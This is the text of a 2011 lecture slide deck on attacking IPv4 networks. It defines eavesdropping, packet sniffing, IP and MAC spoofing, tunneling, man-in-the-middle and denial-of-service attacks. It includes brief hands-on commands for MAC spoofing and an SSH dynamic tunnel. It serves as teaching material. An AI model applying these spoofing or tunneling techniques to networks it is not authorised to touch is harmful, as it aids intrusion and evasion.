3. AGENDA
ATTACKING IP V4
PASSIVE
ACTIVE
COMMON TYPES OF ATTACK + HANDS ON
EAVESDROPPING
SNIFFER ATTACK
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
4. AGENDA
COMMON TYPES OF ATTACK
SPOOFING
TUNNELING
MAN-IN-THE-MIDDLE (MITM) ATTACK
DENIAL OF SERVICE ATTACK
DEFENCE
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
5. NETWORK LAYER
NO. 3 FROM OSI MODEL
PROVIDES THE FUNCTIONAL AND PROCEDURAL MEANS
OF TRANSFERING VARIABLE LENGTH DATA SEQUENCES
FROM SOURCE HOST TO A DESTINATION ON ONE
NETWORK TO ANOTHER, WHILE MAINTAINING THE QOS
REQUESTED BY TRANSPORT LAYER
FUCTION: PATH DETERMINATION AND LOGICAL
ADRESSING; DATA UNIT : PACKET/DATAGRAM
IP (IPV4, IPV6), ICMP, IPSEC, IGMP, IPX, APPLE TALK
[1]: WIKIPEDIA.ORG
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
7. INTERNET PROTOCOL
RESPONSIBLE FOR ADDRESSING HOSTS AND ROUTING
DATAGRAM (PACKETS) FROM A SOURCE HOST TO
DESTINATION HOST ACCROSS ONE OR MORE IP
NETWORK.
[1]: WIKIPEDIA.ORG
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
8. IPV4
FOURTH REVISION IN THE DEVELOPMENT OF IP AND THE
FIRST VERSION OF THE PROTOCOL WIDELY DEPLOYED
CONNECTIONLESS, NOT GUARANTEE DELIVERY, NOT
ASSURING PROPER SEQUENCE OR AVOIDANCE OF
DUPLICATE DELIVERY,
32 BIT = 192.168.0.1
IPSEC IS OPTIONAL
[1]: WIKIPEDIA.ORG
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
9. IPV 6
SUCCESSOR OF IPV4 WITH MORE “BETTER”
IMPROVEMENTS
NEW PACKET HEADER
MULTICAST (MULTIPLE DESTINATION IN SINGLE
OPERATION)
STATELESS ADDRESS AUTO CONFIGURATION
LARGER ADDRESS SPACE 128 BIT = 2001:0db8:85a3:0000:0000:8a2e:0370:7334
IPSEC SUPPORT IS MANDATORY
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
10. IPSEC
PROTOCOL SUITE FOR SECURING INTERNET PROTOCOL
(IP) COMMUNICATIONS BY AUTHENTICATING AND
ENCRYPTINH EACH IP PACKET OF A COMMUNICATION
SESSION.
END-TO-END SECURITY SCHEME
PROTECT ANY APPLICATION TRAFFIC ACCROSS IP
NETWORK
AUTHENTICATION HEADER (AH), ENCAPSULATING
SECURITY PAYLOAD (ESP), SECURITY ASSOCIATIONS
(SA)
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
14. ATTACKING IPV4
SECURITY ISSUE LIES ON INTERNET PROTOCOL
(NETWORK LAYER), NO AUTH AND ENCRYPTION
IPSEC OPTIONAL
UPPER LAYER, CREATED WITHOUT SECURITY
CONSIDERATIONS,
TCP PROTOCOLS: FTP, TELNET, SMTP, POP3
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
15. ATTACKING IPV4
PASSIVE : NETWORK PACKET INFORMATION MIGHT BE
MONITORED;
ACTIVE: NETWORK PACKET INFORMATION IS ALTERED
IN INTENT TO MODIFY, CORRUPT, OR DESTROY TEH
DATA OR THE NETWORK.
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
16. EAVESDROPPING
THE MAJORITY OF NETWORK COMMUNICATIONS OCCUR
IN UNSECURED OR “CLEARTEXT” FORMAT
THE ABILITY TO MONITOR THE NETWORK
COMMUNICATION IS THE BIGGEST SECURITY PROBLEMS
THAT WE’VE FACED
HUB NETWORK DEVICE, ACCESS TO THE GATEWAY/
ROUTER DEVICE
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
17. SNIFFER ATTACK
SNIFFER IS AN APPLICATION OR DEVICE THAT CAN READ,
MONITOR, AND CAPTURE NETWORK PACKET.
IF PACKET NOT ENCRYPTED THE ATTACKER CAN VIEW
FULL DATA INSIDE THE PACKET
IF PACKET ENCRYPTED THE ATTACKER NEED TO
CREATE/USE/HAVE A VALID KEY
TUNNEL ONLY PACKET CAN ALSO BE BROKEN OPEN AND
READ
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
20. SPOOFING
SPOOF = MASQUEARADE[1]
IS A SITUATION IN WHICH A PROGRAM SUCCESSFULLY
MASQUARADES AS ANOTHER BY FALSIFYING DATA AND
THEREBY GAINING AN ILLEGITIMATE ADVANTAGE[2]
[1]: RFC4949
[2]: WIKIPEDIA.ORG
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
21. SPOOFING
IPSPOOFING, E.G: MODIFY SOURCE ADDRESS
A COMMON MISCONCEPTION: IP SPOOFING CAN BE USED
TO HIDE IP ADDRESS WHILE SURFING THE INTERNET,
CHATTING, ON-LINE, AND SO FORTH. THIS IS GENERALLY
NOT TRUE. FORGING THE SOURCES IP ADDRESS CAUSES
THE RESPONSES TO BE MISDIRECTED, MEANING CANNOT
CREATE NORMAL NETWORK CONNECTION.[1]
USUALLY COMBINE WITH NETWORK DOS/DDOS ATTACK
[1]: ISS.NET
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
22. HANDS ON
MAC SPOOFING
IFCONFIG (IFACE) HW ETHER (NEW MAC)
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
23. TUNNELING
TUNNEL IS A COMMUNICATION CHANNEL CREATED IN A
COMPUTER NETWORK BY ENCAPSULATING (I.E.,
LAYERING) A COMMUNICATION PROTOCOL’S DATA
PACKETS IN (I.E., ABOVE) A SECOND PROTOCOL THAT
NORMALLY WOULD BE CARRIED ABOVE, OR AT THE SAME
LAYER AS, THE FIRST ONE. [1]
HTTP, SSH, DNS, ICMP
SSH FOO@DOO -D PORT
[1]: RFC4949
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
25. MAN-IN-THE-MIDDLE
A FORM OF ATTACK IN WHICH THE ATTACKER MAKES
INDEPENDENT CONNECTIONS WITH THE VICTIMS AND
RELAYS MESSAGES BETWEEN THEM, MAKING THEM
BELIEVE THAT THEY ARE TALKING DIRECTLY TO EACH
OTHER , WHEN IN FACT THE ENTIRE CONVERSATION
CONTROLLED BY THE ATTACKER.
ATTACKER IMPERSONATE EACH ENDPOINT TO THE
SATISFACTION OF THE OTHER
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
28. DENIAL OF SERVICE
THE PREVENTION OF AUTHORIZED ACCESS TO A SYSTEM
RESOURCE OR THE DELAYING OF SYSTEM OPERATIONS
AND FUNCTION. [1]
PING OF DEATH (ICMP FLOODING), SYNFLOOD
DISTRIBUTED DOS, BOT NET
[1]: RFC4949
AHMAD MUAMMAR !(C)2011 | @Y3DIPS
29. DENIAL OF SERVICE
DOS ATTACKER MAY:
ATTEMPT TO FLOOD A NETWORK, THEREBY
PREVENTING LEGITIMATE NETWORK TRAFFIC
ATTEMPT TO DISRUPT CONNECTIONS BETWEEN TWO
MACHINES, THEREBY PREVENTING ACCESS TO
SERVICE
ATTEMPT TO PREVENT PARTICULAR INDIVIDUAL FROM
ACCESING A SERVICE
ATTEMPT TO DISRUPT SERVICE TO A SPECIFIC SYSTEM.
AHMAD MUAMMAR !(C)2011 | @Y3DIPS